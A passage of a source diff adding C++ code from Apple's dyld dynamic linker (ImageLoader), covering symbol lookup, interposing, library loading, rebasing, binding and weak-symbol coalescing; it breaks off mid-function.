runResolver); + return true; + } + return false; +} + + +// private method that handles circular dependencies by only search any image once +const ImageLoader::Symbol* ImageLoader::findExportedSymbolInDependentImagesExcept(const char* name, + const ImageLoader** dsiStart, const ImageLoader**& dsiCur, const ImageLoader** dsiEnd, const ImageLoader** foundIn) const +{ + const ImageLoader::Symbol* sym; + // search self + if ( notInImgageList(this, dsiStart, dsiCur) ) { + sym = this->findExportedSymbol(name, false, this->getPath(), foundIn); + if ( sym != NULL ) + return sym; + *dsiCur++ = this; + } + + // search directly dependent libraries + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( (dependentImage != NULL) && notInImgageList(dependentImage, dsiStart, dsiCur) ) { + sym = dependentImage->findExportedSymbol(name, false, libPath(i), foundIn); + if ( sym != NULL ) + return sym; + } + } + + // search indirectly dependent libraries + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( (dependentImage != NULL) && notInImgageList(dependentImage, dsiStart, dsiCur) ) { + *dsiCur++ = dependentImage; + sym = dependentImage->findExportedSymbolInDependentImagesExcept(name, dsiStart, dsiCur, dsiEnd, foundIn); + if ( sym != NULL ) + return sym; + } + } + + return NULL; +} + + +const ImageLoader::Symbol* ImageLoader::findExportedSymbolInDependentImages(const char* name, const LinkContext& context, const ImageLoader** foundIn) const +{ + unsigned int imageCount = context.imageCount()+2; + const ImageLoader* dontSearchImages[imageCount]; + dontSearchImages[0] = this; // don't search this image + const ImageLoader** cur = &dontSearchImages[1]; + return this->findExportedSymbolInDependentImagesExcept(name, &dontSearchImages[0], cur, &dontSearchImages[imageCount], foundIn); +} + +const ImageLoader::Symbol* ImageLoader::findExportedSymbolInImageOrDependentImages(const char* name, const LinkContext& context, const ImageLoader** foundIn) const +{ + unsigned int imageCount = context.imageCount()+2; + const ImageLoader* dontSearchImages[imageCount]; + const ImageLoader** cur = &dontSearchImages[0]; + return this->findExportedSymbolInDependentImagesExcept(name, &dontSearchImages[0], cur, &dontSearchImages[imageCount], foundIn); +} + +// this is called by initializeMainExecutable() to interpose on the initial set of images +void ImageLoader::applyInterposing(const LinkContext& context) +{ + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_APPLY_INTERPOSING, 0, 0, 0); + if ( fgInterposingTuples.size() != 0 ) + this->recursiveApplyInterposing(context); +} + + +uintptr_t ImageLoader::interposedAddress(const LinkContext& context, uintptr_t address, const ImageLoader* inImage, const ImageLoader* onlyInImage) +{ + //dyld::log("interposedAddress(0x%08llX), tupleCount=%lu\n", (uint64_t)address, fgInterposingTuples.size()); + for (std::vector::iterator it=fgInterposingTuples.begin(); it != fgInterposingTuples.end(); it++) { + //dyld::log(" interposedAddress: replacee=0x%08llX, replacement=0x%08llX, neverImage=%p, onlyImage=%p, inImage=%p\n", + // (uint64_t)it->replacee, (uint64_t)it->replacement, it->neverImage, it->onlyImage, inImage); + // replace all references to 'replacee' with 'replacement' + if ( (address == it->replacee) && (it->neverImage != inImage) && ((it->onlyImage == NULL) || (it->onlyImage == inImage)) ) { + if ( context.verboseInterposing ) { + dyld::log("dyld interposing: replace 0x%lX with 0x%lX\n", it->replacee, it->replacement); + } + return it->replacement; + } + } + return address; +} + +void ImageLoader::applyInterposingToDyldCache(const LinkContext& context) { + if (!context.dyldCache) + return; + if (!context.dyldCache->header.builtFromChainedFixups) + return; + if (fgInterposingTuples.empty()) + return; + + // make the cache writable for this block + DyldSharedCache::DataConstScopedWriter patcher(context.dyldCache, mach_task_self(), (context.verboseMapping ? &dyld::log : nullptr)); + + // For each of the interposed addresses, see if any of them are in the shared cache. If so, find + // that image and apply its patch table to all uses. + uintptr_t cacheStart = (uintptr_t)context.dyldCache; + for (std::vector::iterator it=fgInterposingTuples.begin(); it != fgInterposingTuples.end(); it++) { + if ( context.verboseInterposing ) + dyld::log("dyld: interpose: Trying to interpose address 0x%08llx\n", (uint64_t)it->replacee); + uint32_t imageIndex; + uint32_t cacheOffsetOfReplacee = (uint32_t)(it->replacee - cacheStart); + if (!context.dyldCache->addressInText(cacheOffsetOfReplacee, &imageIndex)) + continue; + dyld3::closure::ImageNum imageInCache = imageIndex+1; + if ( context.verboseInterposing ) + dyld::log("dyld: interpose: Found shared cache image %d for 0x%08llx\n", imageInCache, (uint64_t)it->replacee); + context.dyldCache->forEachPatchableExport(imageIndex, ^(uint32_t cacheOffsetOfImpl, const char* exportName) { + // Skip patching anything other than this symbol + if (cacheOffsetOfImpl != cacheOffsetOfReplacee) + return; + if ( context.verboseInterposing ) { + const dyld3::closure::Image* image = context.dyldCache->cachedDylibsImageArray()->imageForNum(imageInCache); + dyld::log("dyld: interpose: Patching uses of symbol %s in shared cache binary at %s\n", exportName, image->path()); + } + uintptr_t newLoc = it->replacement; + context.dyldCache->forEachPatchableUseOfExport(imageIndex, cacheOffsetOfImpl, ^(dyld_cache_patchable_location patchLocation) { + uintptr_t* loc = (uintptr_t*)(cacheStart+patchLocation.cacheOffset); +#if __has_feature(ptrauth_calls) + if ( patchLocation.authenticated ) { + dyld3::MachOLoaded::ChainedFixupPointerOnDisk ptr = *(dyld3::MachOLoaded::ChainedFixupPointerOnDisk*)loc; + ptr.arm64e.authRebase.auth = true; + ptr.arm64e.authRebase.addrDiv = patchLocation.usesAddressDiversity; + ptr.arm64e.authRebase.diversity = patchLocation.discriminator; + ptr.arm64e.authRebase.key = patchLocation.key; + *loc = ptr.arm64e.signPointer(loc, newLoc + DyldSharedCache::getAddend(patchLocation)); + if ( context.verboseInterposing ) + dyld::log("dyld: interpose: *%p = %p (JOP: diversity 0x%04X, addr-div=%d, key=%s)\n", + loc, (void*)*loc, patchLocation.discriminator, patchLocation.usesAddressDiversity, DyldSharedCache::keyName(patchLocation)); + return; + } +#endif + if ( context.verboseInterposing ) + dyld::log("dyld: interpose: *%p = 0x%0llX (dyld cache patch) to %s\n", loc, newLoc + DyldSharedCache::getAddend(patchLocation), exportName); + *loc = newLoc + (uintptr_t)DyldSharedCache::getAddend(patchLocation); + }); + }); + } +} + +void ImageLoader::addDynamicInterposingTuples(const struct dyld_interpose_tuple array[], size_t count) +{ + for(size_t i=0; i < count; ++i) { + ImageLoader::InterposeTuple tuple; + tuple.replacement = (uintptr_t)array[i].replacement; + tuple.neverImage = NULL; + tuple.onlyImage = this; + tuple.replacee = (uintptr_t)array[i].replacee; + // chain to any existing interpositions + for (std::vector::iterator it=fgInterposingTuples.begin(); it != fgInterposingTuples.end(); it++) { + if ( (it->replacee == tuple.replacee) && (it->onlyImage == this) ) { + tuple.replacee = it->replacement; + } + } + ImageLoader::fgInterposingTuples.push_back(tuple); + } +} + +// dyld should tell the kernel when it is doing root fix-ups +void ImageLoader::vmAccountingSetSuspended(const LinkContext& context, bool suspend) +{ +#if TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR + static bool sVmAccountingSuspended = false; + if ( suspend == sVmAccountingSuspended ) + return; + if ( context.verboseBind ) + dyld::log("set vm.footprint_suspend=%d\n", suspend); + int newValue = suspend ? 1 : 0; + int oldValue = 0; + size_t newlen = sizeof(newValue); + size_t oldlen = sizeof(oldValue); + int ret = sysctlbyname("vm.footprint_suspend", &oldValue, &oldlen, &newValue, newlen); + if ( context.verboseBind && (ret != 0) ) + dyld::log("vm.footprint_suspend => %d, errno=%d\n", ret, errno); + sVmAccountingSuspended = suspend; +#endif +} + + +void ImageLoader::link(const LinkContext& context, bool forceLazysBound, bool preflightOnly, bool neverUnload, const RPathChain& loaderRPaths, const char* imagePath) +{ + //dyld::log("ImageLoader::link(%s) refCount=%d, neverUnload=%d\n", imagePath, fDlopenReferenceCount, fNeverUnload); + + // clear error strings + (*context.setErrorStrings)(0, NULL, NULL, NULL); + + uint64_t t0 = mach_absolute_time(); + this->recursiveLoadLibraries(context, preflightOnly, loaderRPaths, imagePath); + context.notifyBatch(dyld_image_state_dependents_mapped, preflightOnly); + + // we only do the loading step for preflights + if ( preflightOnly ) + return; + + uint64_t t1 = mach_absolute_time(); + context.clearAllDepths(); + this->updateDepth(context.imageCount()); + + __block uint64_t t2, t3, t4, t5; + { + dyld3::ScopedTimer(DBG_DYLD_TIMING_APPLY_FIXUPS, 0, 0, 0); + t2 = mach_absolute_time(); + this->recursiveRebaseWithAccounting(context); + context.notifyBatch(dyld_image_state_rebased, false); + + t3 = mach_absolute_time(); + if ( !context.linkingMainExecutable ) + this->recursiveBindWithAccounting(context, forceLazysBound, neverUnload); + + t4 = mach_absolute_time(); + if ( !context.linkingMainExecutable ) + this->weakBind(context); + t5 = mach_absolute_time(); + } + + // interpose any dynamically loaded images + if ( !context.linkingMainExecutable && (fgInterposingTuples.size() != 0) ) { + dyld3::ScopedTimer timer(DBG_DYLD_TIMING_APPLY_INTERPOSING, 0, 0, 0); + this->recursiveApplyInterposing(context); + } + + // now that all fixups are done, make __DATA_CONST segments read-only + if ( !context.linkingMainExecutable ) + this->recursiveMakeDataReadOnly(context); + + if ( !context.linkingMainExecutable ) + context.notifyBatch(dyld_image_state_bound, false); + uint64_t t6 = mach_absolute_time(); + + if ( context.registerDOFs != NULL ) { + std::vector dofs; + this->recursiveGetDOFSections(context, dofs); + context.registerDOFs(dofs); + } + uint64_t t7 = mach_absolute_time(); + + // clear error strings + (*context.setErrorStrings)(0, NULL, NULL, NULL); + + fgTotalLoadLibrariesTime += t1 - t0; + fgTotalRebaseTime += t3 - t2; + fgTotalBindTime += t4 - t3; + fgTotalWeakBindTime += t5 - t4; + fgTotalDOF += t7 - t6; + + // done with initial dylib loads + fgNextPIEDylibAddress = 0; +} + + +void ImageLoader::printReferenceCounts() +{ + dyld::log(" dlopen=%d for %s\n", fDlopenReferenceCount, getPath() ); +} + + +bool ImageLoader::decrementDlopenReferenceCount() +{ + if ( fDlopenReferenceCount == 0 ) + return true; + --fDlopenReferenceCount; + return false; +} + + +// upward dylib initializers can be run too soon +// To handle dangling dylibs which are upward linked but not downward, all upward linked dylibs +// have their initialization postponed until after the recursion through downward dylibs +// has completed. +void ImageLoader::processInitializers(const LinkContext& context, mach_port_t thisThread, + InitializerTimingList& timingInfo, ImageLoader::UninitedUpwards& images) +{ + uint32_t maxImageCount = context.imageCount()+2; + ImageLoader::UninitedUpwards upsBuffer[maxImageCount]; + ImageLoader::UninitedUpwards& ups = upsBuffer[0]; + ups.count = 0; + // Calling recursive init on all images in images list, building a new list of + // uninitialized upward dependencies. + for (uintptr_t i=0; i < images.count; ++i) { + images.imagesAndPaths[i].first->recursiveInitialization(context, thisThread, images.imagesAndPaths[i].second, timingInfo, ups); + } + // If any upward dependencies remain, init them. + if ( ups.count > 0 ) + processInitializers(context, thisThread, timingInfo, ups); +} + + +void ImageLoader::runInitializers(const LinkContext& context, InitializerTimingList& timingInfo) +{ + uint64_t t1 = mach_absolute_time(); + mach_port_t thisThread = mach_thread_self(); + ImageLoader::UninitedUpwards up; + up.count = 1; + up.imagesAndPaths[0] = { this, this->getPath() }; + processInitializers(context, thisThread, timingInfo, up); + context.notifyBatch(dyld_image_state_initialized, false); + mach_port_deallocate(mach_task_self(), thisThread); + uint64_t t2 = mach_absolute_time(); + fgTotalInitTime += (t2 - t1); +} + + +void ImageLoader::bindAllLazyPointers(const LinkContext& context, bool recursive) +{ + if ( ! fAllLazyPointersBound ) { + fAllLazyPointersBound = true; + + if ( recursive ) { + // bind lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->bindAllLazyPointers(context, recursive); + } + } + // bind lazies in this image + DyldSharedCache::DataConstLazyScopedWriter patcher(context.dyldCache, mach_task_self(), context.verboseMapping ? &dyld::log : nullptr); + this->doBindJustLazies(context, patcher); + } +} + + +bool ImageLoader::allDependentLibrariesAsWhenPreBound() const +{ + return fAllLibraryChecksumsAndLoadAddressesMatch; +} + + +void ImageLoader::markedUsedRecursive(const std::vector& dynamicReferences) +{ + // already visited here + if ( fMarkedInUse ) + return; + fMarkedInUse = true; + + // clear mark on all statically dependent dylibs + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + dependentImage->markedUsedRecursive(dynamicReferences); + } + } + + // clear mark on all dynamically dependent dylibs + for (std::vector::const_iterator it=dynamicReferences.begin(); it != dynamicReferences.end(); ++it) { + if ( it->from == this ) + it->to->markedUsedRecursive(dynamicReferences); + } + +} + +unsigned int ImageLoader::updateDepth(unsigned int maxDepth) +{ + STACK_ALLOC_ARRAY(ImageLoader*, danglingUpwards, maxDepth); + unsigned int depth = this->recursiveUpdateDepth(maxDepth, danglingUpwards); + for (auto& danglingUpward : danglingUpwards) { + if ( danglingUpward->fDepth != 0) + continue; + danglingUpward->recursiveUpdateDepth(maxDepth, danglingUpwards); + } + return depth; +} + +unsigned int ImageLoader::recursiveUpdateDepth(unsigned int maxDepth, dyld3::Array& danglingUpwards) +{ + // the purpose of this phase is to make the images sortable such that + // in a sort list of images, every image that an image depends on + // occurs in the list before it. + if ( fDepth == 0 ) { + // break cycles + fDepth = maxDepth; + + // get depth of dependents + unsigned int minDependentDepth = maxDepth; + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + if ( libIsUpward(i) ) { + if ( dependentImage->fDepth == 0) { + if ( !danglingUpwards.contains(dependentImage) ) + danglingUpwards.push_back(dependentImage); + } + } else { + unsigned int d = dependentImage->recursiveUpdateDepth(maxDepth, danglingUpwards); + if ( d < minDependentDepth ) + minDependentDepth = d; + } + } + // make sure need to re-bind propagates up + if ( dependentImage != NULL ) { + if ( fAllLibraryChecksumsAndLoadAddressesMatch && !dependentImage->fAllLibraryChecksumsAndLoadAddressesMatch ) { + fAllLibraryChecksumsAndLoadAddressesMatch = false; + } + } + } + // make me less deep then all my dependents + fDepth = minDependentDepth - 1; + + } + return fDepth; +} + + +void ImageLoader::recursiveLoadLibraries(const LinkContext& context, bool preflightOnly, const RPathChain& loaderRPaths, const char* loadPath) +{ + if ( fState < dyld_image_state_dependents_mapped ) { + // break cycles + fState = dyld_image_state_dependents_mapped; + + // get list of libraries this image needs + DependentLibraryInfo libraryInfos[fLibraryCount]; + this->doGetDependentLibraries(libraryInfos); + + // get list of rpaths that this image adds + std::vector rpathsFromThisImage; + this->getRPaths(context, rpathsFromThisImage); + const RPathChain thisRPaths(&loaderRPaths, &rpathsFromThisImage); + + // try to load each + bool canUsePrelinkingInfo = true; + for(unsigned int i=0; i < fLibraryCount; ++i){ + ImageLoader* dependentLib; + bool depLibReExported = false; + DependentLibraryInfo& requiredLibInfo = libraryInfos[i]; + if ( preflightOnly && context.inSharedCache(requiredLibInfo.name) ) { + // dlopen_preflight() on image in shared cache leaves it loaded but not objc initialized + // in preflight mode, don't even load dylib that are in the shared cache because they will never be unloaded + setLibImage(i, NULL, false, false); + continue; + } + try { + unsigned cacheIndex; + dependentLib = context.loadLibrary(requiredLibInfo.name, true, this->getPath(), &thisRPaths, cacheIndex); + if ( dependentLib == this ) { + // found circular reference, perhaps DYLD_LIBARY_PATH is causing this rdar://problem/3684168 + dependentLib = context.loadLibrary(requiredLibInfo.name, false, NULL, NULL, cacheIndex); + if ( dependentLib != this ) + dyld::warn("DYLD_ setting caused circular dependency in %s\n", this->getPath()); + } + if ( fNeverUnload ) + dependentLib->setNeverUnload(); + if ( requiredLibInfo.upward ) { + } + else { + dependentLib->fIsReferencedDownward = true; + } + LibraryInfo actualInfo = dependentLib->doGetLibraryInfo(requiredLibInfo.info); + depLibReExported = requiredLibInfo.reExported; + if ( ! depLibReExported ) { + // for pre-10.5 binaries that did not use LC_REEXPORT_DYLIB + depLibReExported = dependentLib->isSubframeworkOf(context, this) || this->hasSubLibrary(context, dependentLib); + } + // check found library version is compatible + // 0xFFFFFFFF is wildcard that matches any version + if ( (requiredLibInfo.info.minVersion != 0xFFFFFFFF) && (actualInfo.minVersion < requiredLibInfo.info.minVersion) + && ((dyld3::MachOFile*)(dependentLib->machHeader()))->enforceCompatVersion() ) { + // record values for possible use by CrashReporter or Finder + dyld::throwf("Incompatible library version: %s requires version %d.%d.%d or later, but %s provides version %d.%d.%d", + this->getShortName(), requiredLibInfo.info.minVersion >> 16, (requiredLibInfo.info.minVersion >> 8) & 0xff, requiredLibInfo.info.minVersion & 0xff, + dependentLib->getShortName(), actualInfo.minVersion >> 16, (actualInfo.minVersion >> 8) & 0xff, actualInfo.minVersion & 0xff); + } + // prebinding for this image disabled if any dependent library changed + //if ( !depLibCheckSumsMatch ) + // canUsePrelinkingInfo = false; + // prebinding for this image disabled unless both this and dependent are in the shared cache + if ( !dependentLib->inSharedCache() || !this->inSharedCache() ) + canUsePrelinkingInfo = false; + + //if ( context.verbosePrebinding ) { + // if ( !requiredLib.checksumMatches ) + // fprintf(stderr, "dyld: checksum mismatch, (%u v %u) for %s referencing %s\n", + // requiredLibInfo.info.checksum, actualInfo.checksum, this->getPath(), dependentLib->getPath()); + // if ( dependentLib->getSlide() != 0 ) + // fprintf(stderr, "dyld: dependent library slid for %s referencing %s\n", this->getPath(), dependentLib->getPath()); + //} + } + catch (const char* msg) { + //if ( context.verbosePrebinding ) + // fprintf(stderr, "dyld: exception during processing for %s referencing %s\n", this->getPath(), dependentLib->getPath()); + if ( requiredLibInfo.required ) { + fState = dyld_image_state_mapped; + // record values for possible use by CrashReporter or Finder + if ( strstr(msg, "Incompatible library version") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_DYLIB_WRONG_VERSION, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "architecture") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_DYLIB_WRONG_ARCH, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "file system sandbox") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_FILE_SYSTEM_SANDBOX, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "code signature") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_CODE_SIGNATURE, this->getPath(), requiredLibInfo.name, NULL); + else if ( strstr(msg, "malformed") != NULL ) + (*context.setErrorStrings)(DYLD_EXIT_REASON_MALFORMED_MACHO, this->getPath(), requiredLibInfo.name, NULL); + else + (*context.setErrorStrings)(DYLD_EXIT_REASON_DYLIB_MISSING, this->getPath(), requiredLibInfo.name, NULL); + const char* newMsg = dyld::mkstringf("Library not loaded: %s\n Referenced from: %s\n Reason: %s", requiredLibInfo.name, this->getRealPath(), msg); + free((void*)msg); // our free() will do nothing if msg is a string literal + throw newMsg; + } + free((void*)msg); // our free() will do nothing if msg is a string literal + // ok if weak library not found + dependentLib = NULL; + canUsePrelinkingInfo = false; // this disables all prebinding, we may want to just slam import vectors for this lib to zero + } + setLibImage(i, dependentLib, depLibReExported, requiredLibInfo.upward); + } + fAllLibraryChecksumsAndLoadAddressesMatch = canUsePrelinkingInfo; + + // tell each to load its dependents + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + dependentImage->recursiveLoadLibraries(context, preflightOnly, thisRPaths, libraryInfos[i].name); + } + } + // do deep prebind check + if ( fAllLibraryChecksumsAndLoadAddressesMatch ) { + for(unsigned int i=0; i < libraryCount(); ++i){ + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + if ( !dependentImage->allDependentLibrariesAsWhenPreBound() ) + fAllLibraryChecksumsAndLoadAddressesMatch = false; + } + } + } + + // free rpaths (getRPaths() malloc'ed each string) + for(std::vector::iterator it=rpathsFromThisImage.begin(); it != rpathsFromThisImage.end(); ++it) { + const char* str = *it; + free((void*)str); + } + + } +} + + +void ImageLoader::recursiveRebaseWithAccounting(const LinkContext& context) +{ + this->recursiveRebase(context); + vmAccountingSetSuspended(context, false); +} + +void ImageLoader::recursiveRebase(const LinkContext& context) +{ + if ( fState < dyld_image_state_rebased ) { + // break cycles + fState = dyld_image_state_rebased; + + try { + // rebase lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveRebase(context); + } + + // rebase this image + doRebase(context); + + // notify + context.notifySingle(dyld_image_state_rebased, this, NULL); + } + catch (const char* msg) { + // this image is not rebased + fState = dyld_image_state_dependents_mapped; + CRSetCrashLogMessage2(NULL); + throw; + } + } +} + +void ImageLoader::recursiveApplyInterposing(const LinkContext& context) +{ + if ( ! fInterposed ) { + // break cycles + fInterposed = true; + + try { + // interpose lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveApplyInterposing(context); + } + + // interpose this image + doInterpose(context); + } + catch (const char* msg) { + // this image is not interposed + fInterposed = false; + throw; + } + } +} + +void ImageLoader::recursiveMakeDataReadOnly(const LinkContext& context) +{ + if ( ! fMadeReadOnly ) { + // break cycles + fMadeReadOnly = true; + + try { + // handle lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveMakeDataReadOnly(context); + } + + // if this image has __DATA_CONST, make that segment read-only + makeDataReadOnly(); + } + catch (const char* msg) { + fMadeReadOnly = false; + throw; + } + } +} + + +void ImageLoader::recursiveBindWithAccounting(const LinkContext& context, bool forceLazysBound, bool neverUnload) +{ + this->recursiveBind(context, forceLazysBound, neverUnload, nullptr); + vmAccountingSetSuspended(context, false); +} + +void ImageLoader::recursiveBind(const LinkContext& context, bool forceLazysBound, bool neverUnload, const ImageLoader* parent) +{ + // Normally just non-lazy pointers are bound immediately. + // The exceptions are: + // 1) DYLD_BIND_AT_LAUNCH will cause lazy pointers to be bound immediately + // 2) some API's (e.g. RTLD_NOW) can cause lazy pointers to be bound immediately + if ( fState < dyld_image_state_bound ) { + // break cycles + fState = dyld_image_state_bound; + + try { + // bind lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + const ImageLoader* reExportParent = nullptr; + if ( libReExported(i) ) + reExportParent = this; + dependentImage->recursiveBind(context, forceLazysBound, neverUnload, reExportParent); + } + } + // bind this image + this->doBind(context, forceLazysBound, parent); + // mark if lazys are also bound + if ( forceLazysBound || this->usablePrebinding(context) ) + fAllLazyPointersBound = true; + // mark as never-unload if requested + if ( neverUnload ) + this->setNeverUnload(); + + context.notifySingle(dyld_image_state_bound, this, NULL); + } + catch (const char* msg) { + // restore state + fState = dyld_image_state_rebased; + CRSetCrashLogMessage2(NULL); + throw; + } + } +} + + + +// These are mangled symbols for all the variants of operator new and delete +// which a main executable can define (non-weak) and override the +// weak-def implementation in the OS. +static const char* const sTreatAsWeak[] = { + "__Znwm", "__ZnwmRKSt9nothrow_t", + "__Znam", "__ZnamRKSt9nothrow_t", + "__ZdlPv", "__ZdlPvRKSt9nothrow_t", "__ZdlPvm", + "__ZdaPv", "__ZdaPvRKSt9nothrow_t", "__ZdaPvm", + "__ZnwmSt11align_val_t", "__ZnwmSt11align_val_tRKSt9nothrow_t", + "__ZnamSt11align_val_t", "__ZnamSt11align_val_tRKSt9nothrow_t", + "__ZdlPvSt11align_val_t", "__ZdlPvSt11align_val_tRKSt9nothrow_t", "__ZdlPvmSt11align_val_t", + "__ZdaPvSt11align_val_t", "__ZdaPvSt11align_val_tRKSt9nothrow_t", "__ZdaPvmSt11align_val_t" +}; + +size_t ImageLoader::HashCString::hash(const char* v) { + // FIXME: Use hash when it has the correct visibility markup + return std::hash{}(v); +} + +bool ImageLoader::EqualCString::equal(const char* s1, const char* s2) { + return strcmp(s1, s2) == 0; +} + +void ImageLoader::weakBind(const LinkContext& context) +{ + + if (!context.useNewWeakBind) { + weakBindOld(context); + return; + } + + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind start:\n"); + uint64_t t1 = mach_absolute_time(); + + // get set of ImageLoaders that participate in coalecsing + ImageLoader* imagesNeedingCoalescing[fgImagesRequiringCoalescing]; + unsigned imageIndexes[fgImagesRequiringCoalescing]; + int count = context.getCoalescedImages(imagesNeedingCoalescing, imageIndexes); + + // count how many have not already had weakbinding done + int countNotYetWeakBound = 0; + int countOfImagesWithWeakDefinitionsNotInSharedCache = 0; + for(int i=0; i < count; ++i) { + if ( ! imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + ++countNotYetWeakBound; + if ( ! imagesNeedingCoalescing[i]->inSharedCache() ) + ++countOfImagesWithWeakDefinitionsNotInSharedCache; + } + + // don't need to do any coalescing if only one image has overrides, or all have already been done + if ( (countOfImagesWithWeakDefinitionsNotInSharedCache > 0) && (countNotYetWeakBound > 0) ) { + if (!context.weakDefMapInitialized) { + // Initialize the weak def map as the link context doesn't run static initializers + new (&context.weakDefMap) dyld3::Map, ImageLoader::HashCString, ImageLoader::EqualCString>(); + context.weakDefMapInitialized = true; + } + + // We might have to patch the shared cache __DATA_CONST. In that case, we'll create just a single + // patcher when needed. + DyldSharedCache::DataConstLazyScopedWriter patcher(context.dyldCache, mach_task_self(), context.verboseMapping ? &dyld::log : nullptr); + +#if TARGET_OS_OSX + // only do alternate algorithm for dlopen(). Use traditional algorithm for launch + if ( !context.linkingMainExecutable ) { + // Don't take the memory hit of weak defs on the launch path until we hit a dlopen with more weak symbols to bind + if (!context.weakDefMapProcessedLaunchDefs) { + context.weakDefMapProcessedLaunchDefs = true; + + // Walk the nlist for all binaries from launch and fill in the map with any other weak defs + for (int i=0; i < count; ++i) { + const ImageLoader* image = imagesNeedingCoalescing[i]; + // skip images without defs. We've processed launch time refs already + if ( !image->hasCoalescedExports() ) + continue; + // Only process binaries which have had their weak symbols bound, ie, not the new ones we are processing now + // from this dlopen + if ( !image->weakSymbolsBound(imageIndexes[i]) ) + continue; + + Diagnostics diag; + const dyld3::MachOAnalyzer* ma = (const dyld3::MachOAnalyzer*)image->machHeader(); + ma->forEachWeakDef(diag, ^(const char *symbolName, uint64_t imageOffset, bool isFromExportTrie) { + uintptr_t targetAddr = (uintptr_t)ma + (uintptr_t)imageOffset; + if ( isFromExportTrie ) { + // Avoid duplicating the string if we already have the symbol name + if ( context.weakDefMap.find(symbolName) != context.weakDefMap.end() ) + return; + symbolName = strdup(symbolName); + } + context.weakDefMap.insert({ symbolName, { image, targetAddr } }); + }); + } + } + + // Walk the nlist for all binaries in dlopen and fill in the map with any other weak defs + for (int i=0; i < count; ++i) { + const ImageLoader* image = imagesNeedingCoalescing[i]; + if ( image->weakSymbolsBound(imageIndexes[i]) ) + continue; + // skip images without defs. We'll process refs later + if ( !image->hasCoalescedExports() ) + continue; + Diagnostics diag; + const dyld3::MachOAnalyzer* ma = (const dyld3::MachOAnalyzer*)image->machHeader(); + ma->forEachWeakDef(diag, ^(const char *symbolName, uint64_t imageOffset, bool isFromExportTrie) { + uintptr_t targetAddr = (uintptr_t)ma + (uintptr_t)imageOffset; + if ( isFromExportTrie ) { + // Avoid duplicating the string if we already have the symbol name + if ( context.weakDefMap.find(symbolName) != context.weakDefMap.end() ) + return; + symbolName = strdup(symbolName); + } + context.weakDefMap.insert({ symbolName, { image, targetAddr } }); + }); + } + // for all images that need weak binding + for (int i=0; i < count; ++i) { + ImageLoader* imageBeingFixedUp = imagesNeedingCoalescing[i]; + if ( imageBeingFixedUp->weakSymbolsBound(imageIndexes[i]) ) + continue; // weak binding already completed + bool imageBeingFixedUpInCache = imageBeingFixedUp->inSharedCache(); + + if ( context.verboseWeakBind ) + dyld::log("dyld: checking for weak symbols in %s\n", imageBeingFixedUp->getPath()); + // for all symbols that need weak binding in this image + ImageLoader::CoalIterator coalIterator; + imageBeingFixedUp->initializeCoalIterator(coalIterator, i, imageIndexes[i]); + while ( !imageBeingFixedUp->incrementCoalIterator(coalIterator) ) { + const char* nameToCoalesce = coalIterator.symbolName; + uintptr_t targetAddr = 0; + const ImageLoader* targetImage; + // Seatch the map for a previous definition to use + auto weakDefIt = context.weakDefMap.find(nameToCoalesce); + if ( (weakDefIt != context.weakDefMap.end()) && (weakDefIt->second.first != nullptr) ) { + // Found a previous defition + targetImage = weakDefIt->second.first; + targetAddr = weakDefIt->second.second; + } else { + // scan all images looking for definition to use + for (int j=0; j < count; ++j) { + const ImageLoader* anImage = imagesNeedingCoalescing[j]; + bool anImageInCache = anImage->inSharedCache(); + // Don't look at images in dyld cache because cache is + // already coalesced. Only images outside cache can potentially override something in cache. + if ( anImageInCache && imageBeingFixedUpInCache ) + continue; + + //dyld::log("looking for %s in %s\n", nameToCoalesce, anImage->getPath()); + const ImageLoader* foundIn; + const Symbol* sym = anImage->findExportedSymbol(nameToCoalesce, false, &foundIn); + if ( sym != NULL ) { + targetAddr = foundIn->getExportedSymbolAddress(sym, context); + targetImage = foundIn; + if ( context.verboseWeakBind ) + dyld::log("dyld: found weak %s at 0x%lX in %s\n", nameToCoalesce, targetAddr, foundIn->getPath()); + break; + } + } + } + if ( (targetAddr != 0) && (coalIterator.image != targetImage) ) { + if ( coalIterator.image->inSharedCache() ) + patcher.makeWriteable(); + coalIterator.image->updateUsesCoalIterator(coalIterator, targetAddr, (ImageLoader*)targetImage, 0, context); + if (weakDefIt == context.weakDefMap.end()) { + if (targetImage->neverUnload()) { + // Add never unload defs to the map for next time + context.weakDefMap.insert({ nameToCoalesce, { targetImage, targetAddr } }); + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding adding %s to map\n", nameToCoalesce); + } + } else { + // Add a placeholder for unloadable symbols which makes us fall back to the regular search + context.weakDefMap.insert({ nameToCoalesce, { targetImage, targetAddr } }); + if ( context.verboseWeakBind ) { + dyld::log("dyld: 